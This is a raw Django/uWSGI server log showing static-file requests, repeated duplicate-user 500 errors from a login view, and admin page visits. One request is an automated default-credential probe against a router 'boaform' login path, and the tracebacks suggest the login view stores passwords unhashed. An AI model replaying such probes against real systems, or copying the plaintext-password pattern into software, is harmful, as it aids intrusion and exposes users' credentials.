88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1220] 219.228.146.225 () {38 vars in 773 bytes} [Tue Jan 12 05:38:45 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1221] 219.228.146.225 () {38 vars in 771 bytes} [Tue Jan 12 05:38:47 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1222] 219.228.146.225 () {38 vars in 764 bytes} [Tue Jan 12 05:38:47 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1223] 219.228.146.225 () {38 vars in 783 bytes} [Tue Jan 12 05:38:47 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1224] 219.228.146.225 () {38 vars in 829 bytes} [Tue Jan 12 05:38:48 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 923/1225] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:02 2021] POST / => generated 82 bytes in 4 msecs (HTTP/1.1 200) 5 headers in 165 bytes (2 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 154, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") +[pid: 12823|app: 0|req: 924/1226] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:08 2021] POST / => generated 208728 bytes in 166 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 154, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") +[pid: 12823|app: 0|req: 925/1227] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:09 2021] POST / => generated 208728 bytes in 57 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 154, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 148, in execute + result = self._query(query) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/cursors.py", line 310, in _query + conn.query(q) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 548, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 775, in _read_query_result + result.read() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 1156, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/connections.py", line 725, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/protocol.py", line 221, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/pymysql/err.py", line 143, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry 'Lucy' for key 'uid'") +[pid: 12823|app: 0|req: 926/1228] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:12 2021] POST / => generated 208728 bytes in 56 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 927/1229] 219.228.146.225 () {48 vars in 960 bytes} [Tue Jan 12 05:43:14 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1) +[pid: 12823|app: 0|req: 928/1230] 219.228.146.225 () {40 vars in 859 bytes} [Tue Jan 12 05:43:14 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 929/1231] 219.228.146.225 () {40 vars in 861 bytes} [Tue Jan 12 05:43:14 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 930/1232] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:43:21 2021] GET /home/ => generated 8644 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[] +[pid: 12823|app: 0|req: 931/1233] 219.228.146.225 () {40 vars in 874 bytes} [Tue Jan 12 05:43:28 2021] GET /all-1-0-0 => generated 8761 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: -1|req: -1/1234] 219.228.146.225 () {38 vars in 824 bytes} [Tue Jan 12 05:43:28 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 12823|app: -1|req: -1/1235] 219.228.146.225 () {38 vars in 823 bytes} [Tue Jan 12 05:43:28 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +Not Found: /index.htm +[pid: 12823|app: 0|req: 932/1236] 219.228.146.225 () {40 vars in 878 bytes} [Tue Jan 12 05:43:32 2021] GET /index.htm => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /index.htm +[pid: 12823|app: 0|req: 933/1237] 219.228.146.225 () {40 vars in 878 bytes} [Tue Jan 12 05:43:37 2021] GET /index.htm => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 12823|app: 0|req: 934/1238] 219.228.146.225 () {38 vars in 809 bytes} [Tue Jan 12 05:43:49 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[] +[pid: 12823|app: 0|req: 935/1239] 61.151.178.177 () {32 vars in 573 bytes} [Tue Jan 12 05:53:38 2021] GET /all-1-0-0 => generated 8707 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 12823|app: -1|req: -1/1240] 61.151.178.177 () {34 vars in 652 bytes} [Tue Jan 12 05:53:58 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1241] 61.151.178.177 () {34 vars in 633 bytes} [Tue Jan 12 05:55:09 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1242] 61.151.178.177 () {34 vars in 650 bytes} [Tue Jan 12 05:55:29 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1243] 61.151.178.177 () {34 vars in 664 bytes} [Tue Jan 12 05:56:17 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1244] 61.151.178.177 () {34 vars in 685 bytes} [Tue Jan 12 05:56:58 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 12823|app: -1|req: -1/1245] 61.151.178.177 () {34 vars in 624 bytes} [Tue Jan 12 05:57:18 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 12823|app: 0|req: 936/1246] 212.64.18.182 () {28 vars in 321 bytes} [Tue Jan 12 06:14:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /boaform/admin/formLogin +[pid: 12823|app: 0|req: 937/1247] 183.15.122.106 () {22 vars in 313 bytes} [Tue Jan 12 06:16:40 2021] GET /boaform/admin/formLogin?username=ec8&psd=ec8 => generated 3459 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 938/1248] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 06:20:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 939/1249] 219.228.146.187 () {38 vars in 789 bytes} [Tue Jan 12 06:38:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 940/1250] 219.228.146.187 () {40 vars in 849 bytes} [Tue Jan 12 06:38:06 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 941/1251] 219.228.146.187 () {38 vars in 807 bytes} [Tue Jan 12 06:38:08 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 942/1252] 219.228.146.187 () {48 vars in 1011 bytes} [Tue Jan 12 06:38:23 2021] POST /my-admin/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 0) +[pid: 12823|app: 0|req: 943/1253] 219.228.146.187 () {40 vars in 862 bytes} [Tue Jan 12 06:38:23 2021] GET /admin-home/ => generated 9586 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 944/1254] 219.228.146.187 () {38 vars in 872 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 945/1255] 219.228.146.187 () {38 vars in 876 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 946/1256] 219.228.146.187 () {38 vars in 840 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 947/1257] 219.228.146.187 () {38 vars in 884 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 948/1258] 219.228.146.187 () {38 vars in 860 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 12823|app: 0|req: 949/1259] 219.228.146.187 () {38 vars in 916 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 12823|app: 0|req: 950/1260] 219.228.146.187 () {38 vars in 808 bytes} [Tue Jan 12 06:38:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 12823|app: 0|req: 951/1261] 219.228.146.187 () {38 vars in 806 bytes} [Tue Jan 12 06:38:23 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 952/1262] 219.228.146.187 () {38 vars in 860 bytes} [Tue Jan 12 06:38:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 12823|app: 0|req: 953/1263] 219.228.146.187 () {40 vars in 868 bytes} [Tue Jan 12 06:38:26 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 12823|app: 0|req: 954/1264] 219.228.146.187 () {38 vars in 874 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 12823|app: 0|req: 955/1265] 219.228.146.187 () {38 vars in 878 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 12823|app: 0|req: 956/1266] 219.228.146.187 () {38 vars in 886 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 12823|app: 0|req: 957/1267] 219.228.146.187 () {38 vars in 842 bytes} [Tue Jan 12 06:38:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 12823|app: 0|req: 958/1268] 219.228.146.187 () {38 vars in 862 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 12823|app: 0|req: 959/1269] 219.228.146.187 () {38 vars in 862 bytes} [Tue Jan 12 06:38:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not 